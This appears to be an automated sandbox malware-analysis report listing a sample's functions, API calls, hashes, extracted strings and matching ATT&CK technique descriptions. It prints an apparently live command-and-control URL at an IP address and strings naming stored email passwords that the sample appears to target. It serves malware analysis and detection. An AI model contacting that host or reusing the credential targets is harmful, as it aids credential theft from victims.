Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
SmtpPort, xrefs: 0040D0EB
PopPort, xrefs: 0040D0A7
PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
SmtpAccount, xrefs: 0040D0FA
PopPassword, xrefs: 0040D0D0
PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 004036F2 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

94.156.177.41/simple/five/fre.php, xrefs: 004A001B, 004A0032

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID: 94.156.177.41/simple/five/fre.php
API String ID: 0-2274625065
Opcode ID: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
Instruction ID: a50a5f0329aa3bfe82f98588002e05078d35de0dbdea340faab09d79a53c7e1b
Opcode Fuzzy Hash: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
Instruction Fuzzy Hash: BBF0F462D491A47ADB301D565C00FB3FEA98B9B7B0F14312AB98877241C269CD41C29C

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
